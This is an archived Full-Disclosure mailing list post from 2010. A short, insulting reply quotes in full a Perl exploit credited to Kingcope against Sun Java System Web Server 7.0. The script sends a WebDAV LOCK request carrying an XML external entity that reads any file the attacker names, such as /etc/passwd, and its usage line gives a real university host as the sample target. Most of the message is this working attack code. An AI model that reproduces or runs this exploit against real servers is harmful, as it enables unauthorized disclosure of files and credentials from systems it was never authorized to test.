lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <v2r3af3d47c1004030737se0629015q777beb5f8a613dca@mail.gmail.com>
Date: Sat, 3 Apr 2010 16:37:19 +0200
From: Christian Sciberras <uuf6429@...il.com>
To: Kingcope <kcope2@...glemail.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Sun D3VS SM0KiNG PoT AGAiN

"Sun D3VS SM0KiNG PoT AGAiN"
"SuPP0RT iF YOU#RE kRAD KTHX"

What the fuck is wrong with you guys?
Ever gave the psychiatrist a visit?






On Sat, Apr 3, 2010 at 3:14 PM, Kingcope <kcope2@...glemail.com> wrote:

> sun-knockout.pl EXPLOiT CORRECTED, ADD AUTHEN+SSL SuPP0RT iF YOU#RE kRAD
> KTHX
>
> #!/usr/bin/perl
> # aNOTH3R TiP OF THE iCE-BERG ReMOTE eXPLoiT
> # oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo
> # oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo
> # oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo
> # !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !!
> # MAY/2010
> # VERY THANKS TO LSD
> #
> #
> # oO VERiFIED oN Oo
> #
> # SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS
> SERVER 2008 & SunOS 5.10]
> # SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD
> # [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE]
> # RoCKiNG tHA SuRFACE SiNCE 2003 kTHX
>
> use IO::Socket;
> use MIME::Base64;
>
> print "//Sun Microsystems Sun Java System Web Server\n";
> print "//Remote File Disclosure Exploit\n";
> print "//by Kingcope\n";
> print "May/2010\n";
>
> if ($#ARGV != 2) {
>         print "usage: perl sunone.pl <target> <webdav directory> <file to
> get>\n";
>        print "sample: perl sunone.pl lib7.berkeley.edu /dav
> /etc/passwd\n";
>         exit;
> }
>
> $target = $ARGV[0];
>
> $|=1;
>
> $remotefile = $ARGV[2];
> $folder = $ARGV[1];
>
> $KRADXmL =
> "<?xml version=\"1.0\"?>\n"
> ."<!DOCTYPE REMOTE [\n"
> ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
> ."]>\n"
> ."<D:lockinfo xmlns:D='DAV:'>\n"
> ."<D:lockscope><D:exclusive/></D:lockscope>\n"
> ."<D:locktype><D:write/></D:locktype>\n"
> ."<D:owner>\n"
> ."<D:href>\n"
> ."<REMOTE>\n"
> ."<RemoteX>&RemoteX;</RemoteX>\n"
> ."</REMOTE>\n"
> ."</D:href>\n"
> ."</D:owner>\n"
> ."</D:lockinfo>\n";
>
> $sock = IO::Socket::INET->new(PeerAddr => $target,
>                               PeerPort => '80',
>                              Proto    => 'tcp');
>
> print $sock "LOCK /$folder HTTP/1.1\r\n".
>                        "Host: $target\r\n".
>                        "Depth: 0\r\n".
>                        "Connection: close\r\n".
>                        "Content-Type: application/xml\r\nContent-Length:
> ".length($KRADXmL)."\r\n\r\n".
>                        $KRADXmL;
>
> $locktoken = "";
> while(<$sock>) {
>        if ($_ =~ /^Lock-token:\s(.*)?\r/) {
>                $locktoken = $1;
>                chomp $locktoken;
>        }
>        print;
> }
>
> close($sock);
>
> $sock = IO::Socket::INET->new(PeerAddr => $target,
>                               PeerPort => '80',
>                               Proto    => 'tcp');
>
> print $sock "UNLOCK /$folder HTTP/1.1\r\n".
>                        "Host: $target\r\n".
>                        "Connection: close\r\n".
>                        "Lock-token: $locktoken\r\n\r\n";
>
> while(<$sock>) {
>        print;
> }
> close($sock);
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ